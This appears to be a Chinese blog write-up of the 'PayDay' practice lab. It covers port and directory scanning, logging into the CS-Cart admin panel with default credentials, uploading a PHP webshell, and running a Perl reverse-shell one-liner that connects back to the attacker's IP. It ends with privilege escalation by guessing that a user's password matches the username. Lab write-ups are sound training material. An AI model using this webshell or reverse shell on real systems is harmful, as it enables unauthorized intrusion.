PayDay Intermediate

nmap + dirsearch 发现web站点 扫目录
┌──(root㉿kali)-[/home/ftpuserr]
└─# nmap -p- -A 192.168.167.39
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-09 06:56 UTC
Nmap scan report for 192.168.167.39
Host is up (0.072s latency).
Not shown: 65527 closed tcp ports (reset)
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
| ssh-hostkey: 
|   1024 f3:6e:87:04:ea:2d:b3:60:ff:42:ad:26:67:17:94:d5 (DSA)
|_  2048 bb:03:ce:ed:13:f1:9a:9e:36:03:e2:af:ca:b2:35:04 (RSA)
80/tcp  open  http        Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
|_http-title: CS-Cart. Powerful PHP shopping cart software
|_http-server-header: Apache/2.2.4 (Ubuntu) PHP/5.2.3-1ubuntu6
110/tcp open  pop3        Dovecot pop3d
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|_    SSL2_DES_192_EDE3_CBC_WITH_MD5
|_pop3-capabilities: CAPA STLS SASL RESP-CODES TOP PIPELINING UIDL
|_ssl-date: 2024-11-09T06:57:54+00:00; +7s from scanner time.
| ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2008-04-25T02:02:48
|_Not valid after:  2008-05-25T02:02:48
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: MSHOME)
143/tcp open  imap        Dovecot imapd
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|_    SSL2_DES_192_EDE3_CBC_WITH_MD5
| ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2008-04-25T02:02:48
|_Not valid after:  2008-05-25T02:02:48
|_imap-capabilities: LITERAL+ completed STARTTLS IDLE MULTIAPPEND Capability NAMESPACE IMAP4rev1 LOGIN-REFERRALS SORT LOGINDISABLEDA0001 CHILDREN UNSELECT THREAD=REFERENCES OK SASL-IR
|_ssl-date: 2024-11-09T06:57:54+00:00; +7s from scanner time.
445/tcp open  netbios-ssn Samba smbd 3.0.26a (workgroup: MSHOME)
993/tcp open  ssl/imap    Dovecot imapd
|_imap-capabilities: LITERAL+ completed IDLE MULTIAPPEND Capability NAMESPACE IMAP4rev1 LOGIN-REFERRALS SORT AUTH=PLAINA0001 CHILDREN UNSELECT THREAD=REFERENCES OK SASL-IR
| ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2008-04-25T02:02:48
|_Not valid after:  2008-05-25T02:02:48
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|_    SSL2_DES_192_EDE3_CBC_WITH_MD5
|_ssl-date: 2024-11-09T06:57:54+00:00; +7s from scanner time.
995/tcp open  ssl/pop3    Dovecot pop3d
|_pop3-capabilities: CAPA SASL(PLAIN) USER RESP-CODES TOP PIPELINING UIDL
| ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2008-04-25T02:02:48
|_Not valid after:  2008-05-25T02:02:48
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|_    SSL2_DES_192_EDE3_CBC_WITH_MD5
|_ssl-date: 2024-11-09T06:57:54+00:00; +7s from scanner time.
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=11/9%OT=22%CT=1%CU=30359%PV=Y%DS=4%DC=T%G=Y%TM=672F
OS:07EC%P=x86_64-pc-linux-gnu)SEQ(SP=C1%GCD=1%ISR=EF%TI=Z%II=I%TS=7)SEQ(SP=
OS:C2%GCD=1%ISR=EF%TI=Z%II=I%TS=7)SEQ(SP=C3%GCD=1%ISR=EF%TI=Z%II=I%TS=7)SEQ
OS:(SP=D6%GCD=1%ISR=EF%TI=Z%II=I%TS=7)OPS(O1=M551ST11NW5%O2=M551ST11NW5%O3=
OS:M551NNT11NW5%O4=M551ST11NW5%O5=M551ST11NW5%O6=M551ST11)WIN(W1=16A0%W2=16
OS:A0%W3=16A0%W4=16A0%W5=16A0%W6=16A0)ECN(R=Y%DF=Y%T=40%W=16D0%O=M551NNSNW5
OS:%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(
OS:R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=N)T7(R=N)U1(R=Y%DF=N%T=4
OS:0%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=C7D5%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.26a)
|   Computer name: payday
|   NetBIOS computer name: 
|   Domain name: 
|   FQDN: payday
|_  System time: 2024-11-09T01:57:50-05:00
|_smb2-time: Protocol negotiation failed (SMB2)
|_clock-skew: mean: 50m06s, deviation: 2h02m28s, median: 6s
|_nbstat: NetBIOS name: PAYDAY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)

TRACEROUTE (using port 53/tcp)
HOP RTT      ADDRESS
1   69.91 ms 192.168.45.1
2   69.83 ms 192.168.45.254
3   72.32 ms 192.168.251.1
4   72.42 ms 192.168.167.39

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 88.40 seconds

┌──(root㉿kali)-[/home/ftpuserr]
└─# dirsearch -u http://192.168.167.39/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/ftpuserr/reports/http_192.168.167.39/__24-11-09_07-00-23.txt

Target: http://192.168.167.39/

[07:00:23] Starting: 
[07:00:28] 403 -  311B  - /.ht_wsr.txt                                      
[07:00:28] 403 -  314B  - /.htaccess.orig                                   
[07:00:28] 403 -  314B  - /.htaccess.bak1                                   
[07:00:28] 403 -  316B  - /.htaccess.sample                                 
[07:00:28] 403 -  312B  - /.htaccessOLD                                     
[07:00:28] 403 -  314B  - /.htaccess_orig
[07:00:28] 403 -  312B  - /.htaccessBAK
[07:00:28] 403 -  312B  - /.htaccess_sc
[07:00:28] 403 -  315B  - /.htaccess_extra
[07:00:28] 403 -  314B  - /.htaccess.save
[07:00:28] 403 -  313B  - /.htaccessOLD2
[07:00:28] 403 -  305B  - /.html                                            
[07:00:28] 403 -  304B  - /.htm                                             
[07:00:28] 403 -  310B  - /.htpasswds                                       
[07:00:28] 403 -  314B  - /.htpasswd_test
[07:00:28] 403 -  311B  - /.httr-oauth                                      
[07:00:35] 301 -  335B  - /addons  ->  http://192.168.167.39/addons/        
[07:00:35] 200 -    2KB - /admin                                            
[07:00:35] 200 -    2KB - /admin.php
[07:00:36] 200 -    2KB - /admin/_logs/access.log                           
[07:00:36] 200 -    2KB - /admin/.config
[07:00:36] 200 -    2KB - /admin/.htaccess
[07:00:36] 200 -    2KB - /admin/%3bindex/
[07:00:36] 200 -    2KB - /admin/_logs/error.log
[07:00:36] 200 -    2KB - /admin/_logs/access-log
[07:00:36] 200 -    2KB - /admin/_logs/error-log
[07:00:36] 200 -    2KB - /admin/access.log
[07:00:36] 200 -    2KB - /admin/_logs/login.txt
[07:00:36] 200 -    2KB - /admin/
[07:00:36] 200 -    2KB - /admin/account.php
[07:00:36] 200 -    2KB - /admin/_logs/err.log
[07:00:36] 200 -    2KB - /admin/account
[07:00:36] 200 -    2KB - /admin/account.jsp
[07:00:36] 200 -    2KB - /admin/account.html
[07:00:36] 200 -    2KB - /admin/admin-login.php
[07:00:36] 200 -    2KB - /admin/account.aspx
[07:00:36] 200 -    2KB - /admin/admin-login
[07:00:36] 200 -    2KB - /admin/admin-login.aspx
[07:00:36] 200 -    2KB - /admin/account.js
[07:00:37] 200 -    2KB - /admin/admin-login.jsp
[07:00:37] 200 -    2KB - /admin/admin-login.html
[07:00:37] 200 -    2KB - /admin/admin.php
[07:00:37] 200 -    2KB - /admin/admin.aspx
[07:00:37] 200 -    2KB - /admin/admin.html
[07:00:37] 200 -    2KB - /admin/admin-login.js
[07:00:37] 200 -    2KB - /admin/admin/login
[07:00:37] 200 -    2KB - /admin/admin.jsp
[07:00:37] 200 -    2KB - /admin/admin.js
[07:00:37] 200 -    2KB - /admin/admin_login
[07:00:37] 200 -    2KB - /admin/admin_login.php
[07:00:37] 200 -    2KB - /admin/admin_login.aspx
[07:00:37] 200 -    2KB - /admin/admin_login.html
[07:00:37] 200 -    2KB - /admin/admin_login.jsp
[07:00:37] 200 -    2KB - /admin/admin_login.js
[07:00:37] 200 -    2KB - /admin/adminer.php
[07:00:37] 200 -    2KB - /admin/adminLogin
[07:00:37] 200 -    2KB - /admin/adminLogin.php
[07:00:37] 200 -    2KB - /admin/adminLogin.aspx
[07:00:37] 200 -    2KB - /admin/adminLogin.jsp
[07:00:37] 200 -    2KB - /admin/adminLogin.html
[07:00:37] 200 -    2KB - /admin/adminLogin.js
[07:00:37] 200 -    2KB - /admin/backup/
[07:00:37] 200 -    2KB - /admin/backups/
[07:00:37] 200 -    2KB - /admin/config.php
[07:00:37] 200 -    2KB - /admin/controlpanel
[07:00:37] 200 -    2KB - /admin/controlpanel.php
[07:00:37] 200 -    2KB - /admin/controlpanel.aspx
[07:00:37] 200 -    2KB - /admin/controlpanel.jsp
[07:00:37] 200 -    2KB - /admin/controlpanel.html
[07:00:37] 200 -    2KB - /admin/controlpanel.js
[07:00:37] 200 -    2KB - /admin/cp
[07:00:38] 200 -    2KB - /admin/cp.php
[07:00:38] 200 -    2KB - /admin/cp.aspx
[07:00:38] 200 -    2KB - /admin/cp.jsp
[07:00:38] 200 -    2KB - /admin/cp.html
[07:00:38] 200 -    2KB - /admin/cp.js
[07:00:38] 200 -    2KB - /admin/data/autosuggest
[07:00:38] 200 -    2KB - /admin/default
[07:00:38] 200 -    2KB - /admin/db/
[07:00:38] 200 -    2KB - /admin/default.asp
[07:00:38] 200 -    2KB - /admin/default/admin.asp
[07:00:38] 200 -    2KB - /admin/default/login.asp
[07:00:38] 200 -    2KB - /admin/download.php
[07:00:38] 200 -    2KB - /admin/dumper/
[07:00:38] 200 -    2KB - /admin/error.log
[07:00:38] 200 -    2KB - /admin/error.txt
[07:00:38] 200 -    2KB - /admin/error_log
[07:00:38] 200 -    2KB - /admin/errors.log
[07:00:38] 200 -    2KB - /admin/export.php
[07:00:38] 200 -    2KB - /admin/FCKeditor
[07:00:38] 200 -    2KB - /admin/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp
[07:00:38] 200 -    2KB - /admin/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx
[07:00:38] 200 -    2KB - /admin/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php
[07:00:38] 200 -    2KB - /admin/fckeditor/editor/filemanager/connectors/asp/connector.asp
[07:00:38] 200 -    2KB - /admin/fckeditor/editor/filemanager/connectors/asp/upload.asp
[07:00:38] 200 -    2KB - /admin/fckeditor/editor/filemanager/connectors/aspx/connector.aspx
[07:00:38] 200 -    2KB - /admin/fckeditor/editor/filemanager/connectors/aspx/upload.aspx
[07:00:38] 200 -    2KB - /admin/fckeditor/editor/filemanager/connectors/php/connector.php
[07:00:38] 200 -    2KB - /admin/fckeditor/editor/filemanager/connectors/php/upload.php
[07:00:38] 200 -    2KB - /admin/fckeditor/editor/filemanager/upload/asp/upload.asp
[07:00:38] 200 -    2KB - /admin/fckeditor/editor/filemanager/upload/aspx/upload.aspx
[07:00:38] 200 -    2KB - /admin/fckeditor/editor/filemanager/upload/php/upload.php
[07:00:38] 200 -    2KB - /admin/file.php
[07:00:38] 200 -    2KB - /admin/files.php
[07:00:38] 200 -    2KB - /admin/heapdump
[07:00:39] 200 -    2KB - /admin/home                                       
[07:00:39] 200 -    2KB - /admin/home.php                                   
[07:00:39] 200 -    2KB - /admin/home.aspx
[07:00:39] 200 -    2KB - /admin/home.jsp
[07:00:39] 200 -    2KB - /admin/home.html
[07:00:39] 200 -    2KB - /admin/home.js
[07:00:39] 200 -    2KB - /admin/includes/configure.php~
[07:00:39] 200 -    2KB - /admin/index
[07:00:39] 200 -    2KB - /admin/index.php
[07:00:39] 200 -    2KB - /admin/index.aspx
[07:00:39] 200 -    2KB - /admin/index.html
[07:00:39] 200 -    2KB - /admin/index.jsp
[07:00:39] 200 -    2KB - /admin/index.js
[07:00:39] 200 -    2KB - /admin/js/tiny_mce
[07:00:39] 200 -    2KB - /admin/js/tinymce                                 
[07:00:39] 200 -    2KB - /admin/js/tinymce/
[07:00:39] 200 -    2KB - /admin/js/tiny_mce/
[07:00:39] 200 -    2KB - /admin/log
[07:00:39] 200 -    2KB - /admin/log/error.log
[07:00:39] 200 -    2KB - /admin/login
[07:00:39] 200 -    2KB - /admin/login.php
[07:00:39] 200 -    2KB - /admin/login.aspx
[07:00:39] 200 -    2KB - /admin/login.jsp
[07:00:39] 200 -    2KB - /admin/login.html
[07:00:39] 200 -    2KB - /admin/login.js
[07:00:39] 200 -    2KB - /admin/login.asp
[07:00:39] 200 -    2KB - /admin/login.do
[07:00:39] 200 -    2KB - /admin/login.htm
[07:00:39] 200 -    2KB - /admin/login.py
[07:00:39] 200 -    2KB - /admin/login.rb
[07:00:39] 200 -    2KB - /admin/logon.jsp
[07:00:40] 200 -    2KB - /admin/logs/
[07:00:40] 200 -    2KB - /admin/logs/access.log
[07:00:40] 200 -    2KB - /admin/logs/access_log
[07:00:40] 200 -    2KB - /admin/logs/access-log
[07:00:40] 200 -    2KB - /admin/logs/err.log
[07:00:40] 200 -    2KB - /admin/logs/error-log
[07:00:40] 200 -    2KB - /admin/logs/error.log
[07:00:40] 200 -    2KB - /admin/logs/error_log
[07:00:40] 200 -    2KB - /admin/logs/errors.log
[07:00:40] 200 -    2KB - /admin/logs/login.txt
[07:00:40] 200 -    2KB - /admin/manage
[07:00:40] 200 -    2KB - /admin/manage.asp
[07:00:40] 200 -    2KB - /admin/manage/admin.asp
[07:00:40] 200 -    2KB - /admin/manage/login.asp
[07:00:40] 200 -    2KB - /admin/mysql/
[07:00:40] 200 -    2KB - /admin/mysql/index.php
[07:00:40] 200 -    2KB - /admin/mysql2/index.php
[07:00:40] 200 -    2KB - /admin/phpMyAdmin
[07:00:40] 200 -    2KB - /admin/phpMyAdmin/
[07:00:40] 200 -    2KB - /admin/phpmyadmin/
[07:00:40] 200 -    2KB - /admin/phpMyAdmin/index.php
[07:00:40] 200 -    2KB - /admin/phpmyadmin/index.php
[07:00:40] 200 -    2KB - /admin/pMA/
[07:00:40] 200 -    2KB - /admin/phpmyadmin2/index.php
[07:00:40] 200 -    2KB - /admin/pma/
[07:00:40] 200 -    2KB - /admin/PMA/index.php
[07:00:40] 200 -    2KB - /admin/pma/index.php
[07:00:40] 200 -    2KB - /admin/pol_log.txt
[07:00:40] 200 -    2KB - /admin/private/logs                               
[07:00:40] 200 -    2KB - /admin/portalcollect.php?f=http://xxx&t=js
[07:00:40] 200 -    2KB - /admin/release                                    
[07:00:40] 200 -    2KB - /admin/scripts/fckeditor
[07:00:40] 200 -    2KB - /admin/secure/logon.jsp                           
[07:00:40] 200 -    2KB - /admin/signin                                     
[07:00:40] 200 -    2KB - /admin/sqladmin/                                  
[07:00:41] 200 -    2KB - /admin/sxd/                                       
[07:00:41] 200 -    2KB - /admin/sysadmin/                                  
[07:00:41] 200 -    2KB - /admin/tiny_mce                                   
[07:00:41] 200 -    2KB - /admin/tinymce                                    
[07:00:41] 200 -    2KB - /admin/upload.php                                 
[07:00:41] 200 -    2KB - /admin/uploads.php                                
[07:00:41] 200 -    2KB - /admin/user_count.txt                             
[07:00:41] 200 -    2KB - /admin/views/ajax/autocomplete/user/a             
[07:00:41] 200 -    2KB - /admin/web/                                       
[07:00:41] 200 -    2KB - /admin/_logs/error_log                            
[07:00:41] 200 -    2KB - /admin/admin                                      
[07:00:41] 200 -    2KB - /admin/access.txt                                 
[07:00:41] 200 -    2KB - /admin/access_log                                 
[07:00:41] 200 -    2KB - /admin/_logs/access_log                           
[07:00:50] 301 -  336B  - /catalog  ->  http://192.168.167.39/catalog/      
[07:00:50] 403 -  308B  - /cgi-bin/                                         
[07:00:51] 301 -  336B  - /classes  ->  http://192.168.167.39/classes/      
[07:00:51] 200 -    2KB - /classes/                                         
[07:00:52] 200 -   13B  - /config                                           
[07:00:52] 200 -   13B  - /config.php                                       
[07:00:52] 200 -   13B  - /config/aws.yml                                   
[07:00:52] 200 -   13B  - /config/apc.php
[07:00:52] 200 -   13B  - /config/                                          
[07:00:52] 200 -   13B  - /config/app.php
[07:00:52] 200 -   13B  - /config/database.yml.pgsql
[07:00:52] 200 -   13B  - /config/AppData.config
[07:00:52] 200 -   13B  - /config/config.inc
[07:00:52] 200 -   13B  - /config/app.yml
[07:00:52] 200 -   13B  - /config/autoload/                                 
[07:00:52] 200 -   13B  - /config/banned_words.txt
[07:00:52] 200 -   13B  - /config/database.yml.sqlite3
[07:00:52] 200 -   13B  - /config/config.ini
[07:00:52] 200 -   13B  - /config/database.yml~
[07:00:52] 200 -   13B  - /config/db.inc
[07:00:52] 200 -   13B  - /config/master.key
[07:00:52] 200 -   13B  - /config/initializers/secret_token.rb
[07:00:52] 200 -   13B  - /config/database.yml
[07:00:52] 200 -   13B  - /config/databases.yml                             
[07:00:52] 200 -   13B  - /config/development/
[07:00:52] 200 -   13B  - /config/monkcheckout.ini
[07:00:52] 200 -   13B  - /config/monkdonate.ini
[07:00:52] 200 -   13B  - /config/monkid.ini
[07:00:52] 200 -   13B  - /config/routes.yml
[07:00:52] 200 -   13B  - /config/producao.ini
[07:00:52] 200 -   13B  - /config/settings.inc
[07:00:52] 200 -   13B  - /config/settings.ini
[07:00:52] 200 -   13B  - /config/settings.local.yml
[07:00:52] 200 -   13B  - /config/settings/production.yml
[07:00:52] 200 -   13B  - /config/settings.ini.cfm
[07:00:52] 200 -   13B  - /config/site.php
[07:00:52] 200 -   13B  - /config/xml/                                      
[07:00:53] 301 -  333B  - /core  ->  http://192.168.167.39/core/            
[07:00:56] 403 -  308B  - /doc/api/                                         
[07:00:56] 403 -  304B  - /doc/                                             
[07:00:56] 403 -  319B  - /doc/html/index.html
[07:00:56] 403 -  318B  - /doc/stable.version
[07:00:56] 403 -  319B  - /doc/en/changes.html
[07:01:01] 200 -    2KB - /image                                            
[07:01:01] 302 -    0B  - /images/  ->  ../index.php
[07:01:01] 301 -  335B  - /images  ->  http://192.168.167.39/images/        
[07:01:01] 200 -    2KB - /image.php                                        
[07:01:02] 302 -    0B  - /include/  ->  ../index.php                       
[07:01:02] 301 -  336B  - /include  ->  http://192.168.167.39/include/      
[07:01:02] 200 -   13B  - /init/                                            
[07:01:02] 200 -    8KB - /install.php                                      
[07:01:02] 200 -    8KB - /install                                          
[07:01:02] 200 -    8KB - /install.php?profile=default                      
[07:01:03] 200 -    8KB - /install/                                         
[07:01:03] 200 -    8KB - /install/update.log
[07:01:03] 200 -    8KB - /install/index.php?upgrade/                       
[07:01:11] 301 -  337B  - /payments  ->  http://192.168.167.39/payments/    
[07:01:18] 403 -  313B  - /server-status                                    
[07:01:18] 403 -  314B  - /server-status/                                   
[07:01:20] 301 -  334B  - /skins  ->  http://192.168.167.39/skins/          
[07:01:24] 200 -    1B  - /Thumbs.db                                        
[07:01:27] 301 -  332B  - /var  ->  http://192.168.167.39/var/              
[07:01:27] 302 -    0B  - /var/  ->  ../index.php                           

admin路径后台默认密码 admin admin 查看网站框架

image

搜exp 发现漏洞 https://www.exploit-db.com/exploits/48891

image
上传php恶意代码

shell.php
<?php system($_POST[a]);phpinfo(); ?>
getshell
POST /skins/shell.phtml HTTP/1.1

Host: 192.168.167.39

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate, br

Content-Type: application/x-www-form-urlencoded

Content-Length: 159

Origin: http://192.168.167.39

Connection: close

Referer: http://192.168.167.39/skins/shell.phtml

Cookie: csid=0987b3764a00652a88016ad828f35ce6; cart_languageC=EN; secondary_currencyC=usd; acsid=f3235d2078570cbfa48c5cf576165f24; cart_languageA=EN; secondary_currencyA=usd

Upgrade-Insecure-Requests: 1



a=perl%20-MIO%20-e%20'$p=fork;exit,if($p);$c=new%20IO::Socket::INET(PeerAddr,%22192.168.45.250:80%22);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_%20while<>;'

获取完整tty 加 提权
这里找半天提权不知道咋提
数据库也看了 suid 也看了 啥都看了都不知道
后来看wp才知道
admin:admin customer:customer 基于数据库的密码是和用户名一样的所以盲猜密码就是用户名
登录用户partick
partick:patricke
发现可以sudo执行任何命令

image

posted @ 2024-11-09 20:37  WSssSW  阅读(3)  评论(0编辑  收藏  举报